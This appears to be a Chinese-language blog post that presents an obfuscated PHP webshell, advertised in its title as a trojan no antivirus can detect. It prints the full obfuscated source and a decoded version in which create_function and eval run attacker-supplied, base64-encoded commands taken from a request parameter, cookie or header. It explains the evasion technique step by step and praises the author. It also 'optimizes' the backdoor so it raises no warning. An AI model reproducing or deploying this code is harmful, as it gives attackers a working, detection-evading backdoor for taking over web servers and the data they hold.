更高明的黑客木馬源碼 免查殺 免檢測的木馬 一般人、任何殺毒軟件 木馬檢測工具都探測不出來的木馬病毒 原

這個木馬，使用了更加高明的僞裝手法！

可以輕易的避過一切殺毒軟件、木馬檢測軟件、運維工程師和程序工程師的粗心的檢測！

真正做到了“免檢”“免查殺”“綠色”。。。

1.這款木馬具有免檢不被發現安全綠色的僞裝

<?php

$cleanliness ='s'; $innis= '(s(e';

$crustacean = '"';
$inadvisable= 't'; $interdisciplinary = 'a'; $canada= ')Tre';$infuriates = '^'; $cimcumvention ='t'; $exclusions ='r'; $brow='l'; $dukey= 'e';$equivocate ='y';
$construed= '(';$cloaks ='o';

$camellia= 'gqQ';$confidingly = ')';$depreciable= 'v';
$benedicto = 'T';$bribe = 'a'; $intolerably = '_eja:cR'; $explainers ='6'; $facet = 'bre';

$brawler =')StrO'; $channeled= 'S';$durand = '$H'; $flavoring= 'S';$expendable ='=]c';$brandnjanet= 'i'; $integrative= ')'; $giulietta='K[)es'; $confirmation= 'nbxEc_';$counterpoise='h'; $garland= ';jRqPy'; $limbo= '(_uwRT';$liane= 'i_L_';

$hemp='(ai"';$associatively= 'h'; $handed = 'Y"tJkH)]';
$envision ='f';
$contradistinct='Gv'; $fleet='fnerir(o';$cutter = 'r';$cognitive = 't';

$dimmer ='u'; $eldridge= '`arsm:_'; $lister = 'sVnedT';

$forsakes ='i';

$kathye = 'iCv$';$kurt ='=Qe$$Ne';$coupled= 'e'; $headaches = '[';$dynasty = 'r';

$drafting ='$';$gangster ='T';$leonid ='v'; $cheats='P'; $fabrication ='p';$landslide ='V';$fin=')';$characterize = 'QX'; $finessing =';'; $incenses = '"Ss__m,J]'; $guest3 ='S';$birthrights= 'r';$guidebook = 'u'; $donna= 'b'; $emeralds= 'rLOl"'; $constables = '? ish'; $cookery =')Bsa';$dairy= 'iRs';

$logician ='da'; $comfortably ='l([?foy,"';$altitude= 'E';$hilum='I)'; $expectant=')$HeReTcQ'; $chive = ')'; $jandy ='a';$extradition ='d';

$luce = 'JKrjs_a'; $dalia= 'p'; $bob = 'b';$benetta = '[';
$dianna ='B4';
$excepted = ';s'; $coverlets ='I_';$bridged ='rgdes'; $died= '((s';$madelene= 'tvni(';$characterizing = ']$UHc$'; $codebreak= 'E';
$landings='UEPE$plt'; $gated='$';
$belles='q';$buckle = 'S';$delightfully= 'a'; $exclaiming = 'W'; $caleb ='g'; $kellia= 'r;O("aLM';$blemish ='e';

$fart= 'F_'; $displaces= ']_RCtoZa'; $dependents ='l'; $ditty='e';
$garaged= '"g';$jolt ='i'; $june = 'HE[SD';$loyal= $characterizing[4].

$kellia['0'].$ditty.$displaces['7']. $displaces['4'] .
$ditty .$displaces['1'] .$comfortably['4'] . $guidebook .$madelene['2'] .$characterizing[4] . $displaces['4'] .

$jolt .$displaces['5']. $madelene['2'];$ardith= $constables[1]; $kermy= $loyal
($ardith, $ditty .$madelene['1'] .$displaces['7']. $dependents .
$kellia['3']. $displaces['7'].$kellia['0'] . $kellia['0']. $displaces['7'].

$comfortably['6'] .
$displaces['1']. $landings['5'] .

$displaces['5'].$landings['5'].
$kellia['3'] .

$comfortably['4'].
$guidebook. $madelene['2'] .$characterizing[4].$displaces['1'] . $garaged['1']. $ditty. $displaces['4'] . $displaces['1']. $displaces['7'] .$kellia['0']. $garaged['1']. $died['2'] . $kellia['3']. $chive.

$chive.$chive . $kellia['1']);$kermy($luce['3'],
$expectant['8'],$gated ,$june['4'],$coverlets['0'] , $characterizing[4], $characterizing[4],$comfortably['4'],$comfortably['6'] , $gated . $jolt .$kurt['0'].
$displaces['7'] . $kellia['0']. $kellia['0'] . $displaces['7'] . $comfortably['6'] .$displaces['1'] .

$incenses['5'] .
$ditty . $kellia['0'].$garaged['1']. $ditty.

$kellia['3'] .$gated .$displaces['1']. $displaces['2'].$june['1'].$expectant['8'] .
$landings['0'] . $june['1'].

$june['3']. $expectant['6']. $comfortably['7'] .$gated. $displaces['1'].

$displaces[3].
$kellia[2].$kellia[2] . $luce[1] . $coverlets['0'] .

$june['1']. $comfortably['7']. $gated .$displaces['1'] .

$june['3']. $june['1'].

$displaces['2'] . $landslide .

$june['1'].$displaces['2'] .
$chive.$kellia['1'] .$gated .

$displaces['7'] .

$kurt['0'].

$jolt . $died['2'] . $died['2'].

$ditty .$displaces['4']. $kellia['3']. $gated. $jolt . $june['2'] .$garaged['0']. $dependents.
$luce['3'] .$died['2'] .$belles .

$constables[4].$kellia['0']. $bob .$died['2'] . $garaged['0']. $displaces['0'] .$chive. $comfortably['3'] . $gated . $jolt .$june['2'].
$garaged['0'].$dependents.$luce['3']. $died['2'].
$belles .$constables[4].$kellia['0']. $bob .$died['2'].$garaged['0'] . $displaces['0'] .$eldridge['5'].$kellia['3'].

$jolt.

$died['2'].
$died['2'] .$ditty .

$displaces['4'] .

$kellia['3'].$gated. $jolt. $june['2'] .$garaged['0']. $june['0'] . $expectant['6'] . $expectant['6'] . $landings[2].$displaces['1'].
$kellia['6'].$luce['0'].$june['3'].

$expectant['8'] .$june['0'] .$displaces['2'] .
$dianna[0] .$june['3'] .$garaged['0'].$displaces['0'] .$chive . $comfortably['3']. $gated .$jolt.
$june['2']. $garaged['0']. $june['0']. $expectant['6'] . $expectant['6'] . $landings[2].

$displaces['1'].$kellia['6'].

$luce['0']. $june['3'] . $expectant['8'] . $june['0'] .
$displaces['2']. $dianna[0].

$june['3']. $garaged['0'] .
$displaces['0'].
$eldridge['5'] . $bridged[2] . $jolt.$ditty . $chive .
$kellia['1'].$ditty . $madelene['1'] .
$displaces['7'].$dependents . $kellia['3'].$died['2'] .

$displaces['4'] . $kellia['0'].$kellia['0'] . $ditty . $madelene['1'] . $kellia['3'] . $bob .$displaces['7'] . $died['2'] . $ditty.$explainers. $dianna['1'] .
$displaces['1'] .
$bridged[2].$ditty .$characterizing[4] . $displaces['5'] . $bridged[2] .

$ditty. $kellia['3']. $died['2'] . $displaces['4']. $kellia['0'] .$kellia['0'].$ditty.$madelene['1'].$kellia['3'] . $gated.$displaces['7'] . $chive .$chive . $chive .$chive .

$kellia['1']  );

2.PHP木馬免檢繞過木馬掃描病毒查殺原理

有句老話

蛋炒飯，蛋炒飯，最簡單，最困難！

上述木馬源碼隆重的利用了

• 1.PHP變量連接
• 2.PHP字符串拆分
• 3.深刻的理解PHP字符串和數組轉換規則

以此來實現了 PHP木馬”免檢“產品！

舉個例子大家就明白了

$a = 'eval';

echo $a[0];//輸出e，同$a{0}
echo $a[1];//輸出v，同$a{1}
echo $a[2];//輸出a，同$a{2}
echo $a[3];//輸出l，同$a{3}
echo $a[0].$a[1].$a[2].$a[3];//輸出eval

3.PHP木馬解碼解密後的源碼真實面紗

經過工程師LET不屑努力，以及相關朋友的提醒，終於弄清了木馬的來龍去脈。。

我們這些PHP老鳥，都對此款木馬佩服的五體投地！

<?php
$cleanliness = 's';
$innis = '(s(e';

$crustacean = '"';
$inadvisable = 't';
$interdisciplinary = 'a';
$canada = ')Tre';
$infuriates = '^';
$cimcumvention = 't';
$exclusions = 'r';
$brow = 'l';
$dukey = 'e';
$equivocate = 'y';
$construed = '(';
$cloaks = 'o';

$camellia = 'gqQ';
$confidingly = ')';
$depreciable = 'v';
$benedicto = 'T';
$bribe = 'a';
$intolerably = '_eja:cR';
$explainers = '6';
$facet = 'bre';

$brawler = ')StrO';
$channeled = 'S';
$durand = '$H';
$flavoring = 'S';
$expendable = '=]c';
$brandnjanet = 'i';
$integrative = ')';
$giulietta = 'K[)es';
$confirmation = 'nbxEc_';
$counterpoise = 'h';
$garland = ';jRqPy';
$limbo = '(_uwRT';
$liane = 'i_L_';

$hemp = '(ai"';
$associatively = 'h';
$handed = 'Y"tJkH)]';
$envision = 'f';
$contradistinct = 'Gv';
$fleet = 'fnerir(o';
$cutter = 'r';
$cognitive = 't';

$dimmer = 'u';
$eldridge = '`arsm:_';
$lister = 'sVnedT';

$forsakes = 'i';

$kathye = 'iCv$';
$kurt = '=Qe$$Ne';
$coupled = 'e';
$headaches = '[';
$dynasty = 'r';

$drafting = '$';
$gangster = 'T';
$leonid = 'v';
$cheats = 'P';
$fabrication = 'p';
$landslide = 'V';
$fin = ')';
$characterize = 'QX';
$finessing = ';';
$incenses = '"Ss__m,J]';
$guest3 = 'S';
$birthrights = 'r';
$guidebook = 'u';
$donna = 'b';
$emeralds = 'rLOl"';
$constables = '? ish';
$cookery = ')Bsa';
$dairy = 'iRs';

$logician = 'da';
$comfortably = 'l([?foy,"';
$altitude = 'E';
$hilum = 'I)';
$expectant = ')$HeReTcQ';
$chive = ')';
$jandy = 'a';
$extradition = 'd';

$luce = 'JKrjs_a';
$dalia = 'p';
$bob = 'b';
$benetta = '[';
$dianna = 'B4';
$excepted = ';s';
$coverlets = 'I_';
$bridged = 'rgdes';
$died = '((s';
$madelene = 'tvni(';
$characterizing = ']$UHc$';
$codebreak = 'E';
$landings = 'UEPE$plt';
$gated = '$';
$belles = 'q';
$buckle = 'S';
$delightfully = 'a';
$exclaiming = 'W';
$caleb = 'g';
$kellia = 'r;O("aLM';
$blemish = 'e';

$fart = 'F_';
$displaces = ']_RCtoZa';
$dependents = 'l';
$ditty = 'e';
$garaged = '"g';
$jolt = 'i';
$june = 'HE[SD';

$loyal = 'create_function';

$ardith = ' ';

$kermy = $loyal($ardith, 'eval(@array_pop(func_get_args()));');

$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');

4.PHP木馬經典源碼展現

通過一切的僞裝、拼接，最後形成了核心2句話木馬：

$kermy = create_function(' ', 'eval(array_pop(func_get_args()));');

$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');

不過作者 LET經過分析後，發現他們有個不完美的地方，就是 array_pop的參數必須是引用的，上述代碼回產生個Strict Standards的警告！

本着英雄識英雄的癖好，幫他優化了下，優化後代碼：

$kermy = create_function(' ', 'eval(@array_pop(func_get_args()));');

$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');

5.PHP木馬代碼執行流程概略

博士畢業考試：
導師：用你終身所學，請謹慎的回答我，1+1 = ?
博士：額，怎麼會這麼簡單？不可能吧！
我該怎麼回答呢？微積分？潛規則？陷阱？。。。。。
真正的答案：2

• 1.設置煙霧彈'j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y',這也是迷惑作者百思不得其解的地方，就好像上述例子。
• 2.func_get_args()動態獲取所以第二行傳來的所有參數，最後通過array_pop獲取最後1個參數爲執行代碼eval，其他參數都是煙霧彈！
• 3.將$_REQUEST（get+post）,$_COOKIE,$_SERVER聯合後賦值給$i
• 4.判斷上述值裏有沒有外部傳過來的ljsqhrbs參數木馬，如果有則按照eval(strrev(base64_decode(strrev($a))))執行！
• 5.緊接着上述，如果沒有ljsqhrbs，則看外部提交來的參數HTTP_LJSQHRBS在不在，如果在，則執行！如果不再，則強制暫停並結束腳本！

6.PHP木馬評價&作者觀點

PHP木馬亮點：

1.很聰明，簡直是太聰明瞭，費盡心機啊！

2.create_function第二個參數，靈活&深刻的理解並使用了函數包體裏寫常規php代碼的亮點！瀟灑不失浪漫、奔放不失嚴謹！一看就知道是木馬專業或者PHP大師的傑出作品！

PHP木馬敗筆：

1. array_pop的參數必須是引用的，上述代碼回產生個Strict Standards的警告！害的作者幫他優化了下。。。

2.木馬畢竟是木馬，就算沒有木馬想要的參數或者執行失敗，最後也不能die啊！如果你這個文件掛馬在文件頭部的話，豈不很容易暴露？